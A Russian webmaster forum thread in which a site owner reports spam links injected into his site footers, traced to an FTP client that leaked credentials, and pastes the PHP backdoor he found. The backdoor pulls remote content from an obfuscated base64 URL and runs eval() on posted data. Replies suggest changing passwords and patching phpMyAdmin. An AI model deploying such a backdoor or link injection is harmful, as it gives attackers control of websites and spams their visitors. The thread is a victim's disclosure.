Какие то уроды напихали ссылок в подвал по партнеркам

stydent
На сайте с 17.10.2004
Offline
95
1097

Сегодня обнаружил на нескольких сайтах в подвале вот такой код, походу партнера.

Как наказать скотов ? В ментовку заяву писать - скажут давай сервер сюда.

<a href="http://www.pspscene.ru/images/d5/">похудеть</a> <a href="http://dpclub.ru/images/di">диеты</a> <a href="http://kinoraduga.ru/f1/">сбросить вес</a> <a href="http://univerpost.ru/f3/">похудеть</a> <a href="http://alpbook.info/">купить антикварные книги</a> <a href="http://actbook.info/">купить старые книги</a> <a href="http://apebook.info/">куплю старую книгу</a> <a href="http://agebook.info/">куплю электронную книгу</a> <a href="http://ahabook.info/">куплю книги из домашней библиотеки</a> <a href="http://atebook.info/">какую книгу купить</a>

У себя код почистил - проблема была в том что заливались файлы через quteFTP с "лекарством".

Вот через этот код выводится

<?

error_reporting(0);

function fetch($url) {

if (function_exists('curl_exec')) {

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

curl_setopt($ch, CURLOPT_TIMEOUT,6);

curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0');

return curl_exec($ch);

curl_close($ch);

}

else {

return @file_get_contents($url);

}}

$base='aHR0cDovL2RpcGxvYWQudXMudG8vY29udGVudC8=';

$enc='utf';

echo @fetch(base64_decode($base).'?host='.urlencode($_SERVER['HTTP_HOST'])."&$enc");

if($_POST['id']==$base) eval($_POST['ev']);

?>

LEOnidUKG
На сайте с 25.11.2006
Online
1726
#1

Welcome in real Internet :D

quteFTP с "лекарством".

А что он делал на вашем сайте? :D

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/
stydent
На сайте с 17.10.2004
Offline
95
#2

Нашел скотов - вот отсюда урлы берутся

stydent добавил 23.09.2010 в 18:48

LEOnidUKG:
Welcome in real Internet :D



А что он делал на вашем сайте? :D

Да с этим уже сталкивался - сам юзаю Filezilla и пароли вручную ввожу, тут отдавал работу по наполнению - оказывается еще некоторые юзают :)

Речь сейчас о другом, что делать с этими скотами?

Evil_Genius
На сайте с 03.04.2009
Offline
30
#3

Тупо забить на все это. Таких людей армия...место одного павшего война, занимает другой.

заплыл в работе............
olegapro
На сайте с 29.07.2007
Offline
139
#4

95%, что ты с ними ничего не сделаешь. А даже, если все-таки дело дойдет до конца и суд признает виновными, то отделаются незначительным штрафом. Больше потратишь времени, нервов и денег.

Статьи для новичков по дорвеям (/ru/forum/717895) Мой Новый Блог (https://olegapro.com)
NCIS
На сайте с 17.11.2009
Offline
159
#5
Evil_Genius:
Тупо забить на все это. Таких людей армия...место одного павшего война, занимает другой.

+1 почистить всё и забить на это ! Гемора только больше найдёте 🤪

R
На сайте с 08.05.2008
Offline
222
#6

Все могло быть жестче - вам самому могли подкинуть дорвея на сайтик. 🍿 Можете забить на все на это, сменить пароли и впредь быть осторожнее.

Тема по продвижению сайтов. От 30 000 р. со ссылочным и копирайтингом!. (/ru/forum/801720) Темка по аудитам и консультациям. Стоимость аудита 9 000 рублей. (/ru/forum/622569) skype rastijko
Фома
На сайте с 10.11.2006
Offline
600
#7
stydent:
Да с этим уже сталкивался - сам юзаю Filezilla и пароли вручную ввожу, тут отдавал работу по наполнению - оказывается еще некоторые юзают

Ставьте временный пароль на время работ, потом меняйте опять на свой секретный.

Аренда апартаментов на Тенерифе (http://las-americas.ru/).
[Удален]
#8

В свете последних событий у Вас, скорее всего, сервер поламали через уязвимость в phpmyadmin, у меня с аналогичным кодом в папке /tmp/ лежал файлик и были инклуды на него на всех сайтах на сервере.

$base='aHR0cDovL2RpcGxvYWQudXMudG8vY29udGVudC8='; декодируется в

Убедитесь что у вас PhpMyAdmin последней версии (если ветка 2.x), до 2.11.10 он дыряв и есть эксплойт.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий